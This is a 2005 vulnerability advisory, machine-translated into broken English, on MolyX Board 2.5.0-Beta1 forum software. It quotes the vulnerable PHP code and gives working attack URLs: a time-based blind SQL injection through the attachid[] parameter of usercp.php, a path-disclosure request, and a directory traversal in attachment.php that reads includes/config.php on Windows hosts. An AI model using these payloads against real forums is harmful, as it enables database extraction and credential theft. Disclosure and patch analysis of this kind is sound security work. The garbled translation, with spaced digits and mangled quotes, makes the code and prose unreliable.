Lucene search

K
myhack58佚名MYHACK58:6220052505
HistorySep 25, 2005 - 12:00 a.m.

MolyX vulnerability analysis-vulnerability warning-the black bar safety net

2005-09-2500:00:00
佚名
www.myhack58.com
5

Text/SuperHei·Safety Angel[S4T] 2005.09.21
Nonsense:
MolyX Board(hereinafter referred to MXB is MolyX Studios group as if that is CNVBB team development of PHP Forum program, MXB fusion of many forums, absorbing, powerful. The multi-year Forum program finished and improved experience also makes the MXB is more suitable for people’s habits. However, vulnerability is inevitable.

Test version:
MolyX BOARD 2.5.0-Beta1

  1. usercp. php vulnerability

When you delete the attachment variables attachid[]filter not made, lead to the exposure of the absolute path and sql injection vulnerabilities. The analysis is as follows:

Code line 3 9 7—4 0 7

$affected_ids = count($_INPUT[‘attachid’]);
if ( $affected_ids > 0 ) {
$attachments = $DB->query(“SELECT a.*, p. threadid, p. pid
FROM “. TABLE_PREFIX.“attachment a
LEFT JOIN “. TABLE_PREFIX.“post p ON ( a. postid=p. pid )
WHERE a. attachmentid IN (”. implode(”,”,$_INPUT[‘attachid’]).”)
AND a. userid='”.$ bbuserinfo[‘id’].“'”);
if ( $attachment = $DB->fetch_array($attachments) ) {
if ( $attachment[‘location’] ) {
@unlink( $bboptions[‘uploadfolder’].“/”.$ attachment[‘attachpath’].“/”.$ attachment[‘location’] );
}

We see attachid[]after$_INPUT[‘attachid’]submitted to the database query, we’re more$_INPUT [], the 在 global.php line 2 of 3:

$_INPUT = $forums->func->init_variable();

Continue with init_variable (), the init_variable()in includes/functions. the php code is as follows:

function init_variable()
{
$return = array();
foreach(array($_GET,$_POST) AS $type) {
if( is_array($type) ) {
foreach ( $type AS $k => $v) {
if ( is_array($type[$k]) ) {
foreach ( $type[$k] AS $k1 => $v1) {
$return[ $this->clean_key($k) ][ $this->clean_key($k1) ] = $this->clean_value($v1);
}
} else {
$return[ $this->clean_key($k) ] = $this->clean_value($v);
}
}
}
}
return $return;
}

function clean_key($key)
{
if ($key == “”) return “”;
return preg_replace( array(“/\.\./”, “/\\(.+?)\\/”, “/^([\w\.\-\_]+)$/”), array(“”, “”, “$1”), $key );
}

function clean_value($val)
{
if ($val == “”) return “”;

$pregfind = array ( " ", “&”, “<!–”, “–>” );
$pregreplace = array ( " ", “&”, “<!–”, “–>” );
$val = str_replace($pregfind, $pregreplace, $val);

$val = preg_replace( “/<script/i”, “<script”, $val );

$pregfind = array ( “>”, “<”, “"”, “!”, “'” );
$pregreplace = array ( “>”, “<”, “”", “!”, “'” );
$val = str_replace($pregfind, $pregreplace, $val);

$pregfind = array ( “/\n/”, “/\\$/”, “/\r/” );
$pregreplace = array ( “<br />”, “$”, “” );
$val = preg_replace($pregfind, $pregreplace, $val);

if ( $this->allow_unicode ) {
$val = preg_replace(“/([0-9]+);/s”, “\\1;”, $val );
}
if ( get_magic_quotes_gpc() ) {
$val = stripslashes($val);
}
return preg_replace( “/\\\(|?#)/”, "", $val );
}

Filter& < > \ ’ <script, etc. characters.

The specific test use:

Due to the vulnerability statement the query is not what the data output, so we can not use union directly replace the data output, and tnnd default only administrators
You can only see the forum return mysql error message: db_mysql.php line 1 4 1-1 4 7 code
if ($bbuserinfo[‘usergroupid’]==4) {
$this->error = @mysql_error($this->connection_id);
} else {
$the_error = “;
}
$message = “database error: \n\n”;
$message .= $the_error.”\ n\n";
So ordinary users are not error message is returned, that is, 1=1 and 1=2 to give the page the same, so can not use the“classical injections”in the special code.
Fortunately, we have a benchmark (the).

Note: there can be no& < >and so, we injected the statement structure is as follows:

http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid[]=1) and if((ascii(substring(user(),1,1))=0x72)|0, benchmark(1 0 0 0 0 0,md5(0x41)),0)/*

The return delay, then we can determine user()the first letter of the hex value of 0x72, that is the letter r. Note that this process can only be used=
To determine, because the< >have been filtered.:)

When we put$_INPUT[‘attachid’]improper array, when a General variable is submitted, the variable may not implode()and violent wrong, to give the physical path
Submitted to:
http://127.0.0.1/xx/uploads/usercp.php?s=&do=attach&sort=&attachid

Returns: Warning: implode(): Bad arguments. in f:\www\www\xx\uploads\usercp.php on line 4 0 2

Patch:
Official 2 0 0 5. 0 9. 2 0 has been out for patchhttp://www.molyx.com/attachment.php?id=3097&u=2&EXT=txt&attach=1 1 2 7 1 4 6 6 4 7. attach&filename=UPDATE_20050920. txt&attachpath=2
Worth mentioning is, change the patch while patch 2 vulnerabilities, the other one is due to the private. php.$_INPUT[‘pmid’]filter is not strict result of the vulnerability
The use and analysis, keep up with the surface of the Chuck not more, interested can see for yourself(ps: private. php vulnerability not I found, the estimate is official see my test log their find.

  1. attachment. php vulnerability
    Affect system: windows

This is actually the vulnerability had been patched once.:<http://4ngel.net/article/50.htm&gt; but the angel in the article suffer from a small error, no filtering\and…
Resulting in a win on the host, the vulnerability remains, the vulnerability analysis can see the angel in the article, the exploit: a

http://www.xxx.com/attachment.php?id=684&u=3 0 9 6&extension=gif&attach=.\…\…\…\…\…\…\ includes\config. php&filename=1.gif

You can get the includes/config. php in the content.

Solve version filter… / \

Thank you for reading it!!!